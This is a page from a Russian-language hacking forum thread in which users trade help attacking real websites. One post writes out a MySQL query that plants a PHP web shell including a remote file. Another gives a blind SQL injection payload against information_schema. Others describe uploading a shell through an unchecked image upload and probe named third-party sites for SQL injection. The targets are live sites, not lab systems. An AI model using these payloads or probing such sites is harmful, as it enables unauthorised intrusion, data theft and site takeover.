HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2409 из 2422 « Первая < 14091909230923592399 2405 2406 2407 2408 2409 2410 2411 2412 2413 2419 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.07.2008, 05:15
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
С нами: 9420866

Репутация: 228
По умолчанию
Есть трабла:
Смог получить доступ к БД, нашел пхпмайадмин, далее пытаюсь залить шелл через запрос. Делаю так:

Код:
CREATE TABLE `123` (`shl` TEXT NOT NULL) TYPE = MYISAM;  INSERT INTO `123` ( `shl` ) VALUES ('<?php include("тут_адрес_к_шеллу.php") ?>');  SELECT `shl` FROM `123` INTO OUTFILE '';  DROP TABLE `123`
Но оказывается какой-то запрет. Denied for 'user@localhost' (имя юзера дословно не пишу).

Может кто-нибудь знает в чем может быть трабла? Или запрос неправильный составляю...
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 16.07.2008, 08:28
MaSTeR GэN
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
С нами: 9457097

Репутация: 133
По умолчанию
2USAkid по моему ты задавая вопрос сам ответил на него
Цитата:
Есть трабла:
Denied for 'user@localhost'
для залития шелла тебе нужны права filepriv у данного юзера их нет о чем и говорит данная ошибка
 
Ответить с цитированием

  #3  
Старый 16.07.2008, 08:45
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
С нами: 9420866

Репутация: 228
По умолчанию
Цитата:
Сообщение от MaSTeR GэN  
2USAkid по моему ты задавая вопрос сам ответил на него

для залития шелла тебе нужны права filepriv у данного юзера их нет о чем и говорит данная ошибка
Блин... Ладно, поищу альтернативу
 
Ответить с цитированием

  #4  
Старый 16.07.2008, 17:04
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию
id=9'+and+1=if((version()=5),1,(select+table_name+ from+information_schema.tables))/*

А почему вдруг не пашет substring() ? И откуда вообще такая конструкция if() ? Хотя работает...
 
Ответить с цитированием

  #5  
Старый 25.07.2008, 23:01
309958707
Новичок
Регистрация: 22.07.2008
Сообщений: 3
С нами: 9369987

Репутация: 0
По умолчанию
Эх. Жаль... Да я и сам ничего не смог найти. Странный сайт какой-то.
 
Ответить с цитированием

  #6  
Старый 05.08.2008, 17:57
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию
Насчёт последнего,на виртуальном хосте путь до логов один,а на хостинге - другой.Лог файлов виртуального хоста есть,а системы,на которой хостится этот сайт - нету.Смотрел ErrorLog
 
Ответить с цитированием

  #7  
Старый 30.08.2008, 14:27
tor4)
Познающий
Регистрация: 27.05.2008
Сообщений: 51
С нами: 9450895

Репутация: 41
По умолчанию
jon21
Линк в студию))) gg
 
Ответить с цитированием

  #8  
Старый 04.09.2008, 03:47
tor4)
Познающий
Регистрация: 27.05.2008
Сообщений: 51
С нами: 9450895

Репутация: 41
По умолчанию
При загрузке картинки проверки ни какой, можно залить похрен что хоть Войну и Мир.
Заливка происходит в скрипте pages_all.php.
Но при просмотре из админке мы видем что он записался в /pict/page-число.php
И это сбивает основательно, меня Sabe мучал пару часиков) за что ему спасибо и +.
Смотрим html, по поиску вбиваем /pict/ и видем что загружаются они совсем не из /pict/page-число.php
Пробуем. Так оно и есть. ух разобрался.
С первым шеллом меня.
Последний раз редактировалось tor4); 04.09.2008 в 03:54..
 
Ответить с цитированием

  #9  
Старый 29.12.2008, 23:02
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию
Цитата:
Сообщение от sabe  
http://www.xyligan.ru/users/eugenie/blog/blog.php?readpost=4233','')
иьект?
https://forum.antichat.ru/showpost.php?p=307103&postcount=1

Цитата:
Сообщение от F4R  
а вот ещё!
http://www.petarda.ru/default.asp?tmpl=search_list&info=gfd&price_from=& price_to=&orderby=price&ordertype=1%27

пишет: "ошибка БД"

уязвимость?
вообще говоря сортировка меняется
Цитата:
_petarda.ru/default.asp?tmpl=search_list&info=%ED%EE%E2%FB%E9& price_from=0&price_to=9999&orderby=price*1
Цитата:
_petarda.ru/default.asp?tmpl=search_list&info=%ED%EE%E2%FB%E9& price_from=0&price_to=9999&orderby=price*-1
но заюзать багу как говорит Никита Литвинков 50/50 (либо получится, либо нет)
 
Ответить с цитированием

  #10  
Старый 12.01.2009, 21:32
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами: 9326973

Репутация: -25
По умолчанию
Цитата:
Сообщение от Octave_Parango  
Ребята, скуля?
http://www.bethinking.org/resource.php?ID=233' ?
По моему нет! Он вроде фильтруется!
 
Ответить с цитированием
Ответ
Страница 2409 из 2422 « Первая < 14091909230923592399 2405 2406 2407 2408 2409 2410 2411 2412 2413 2419 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...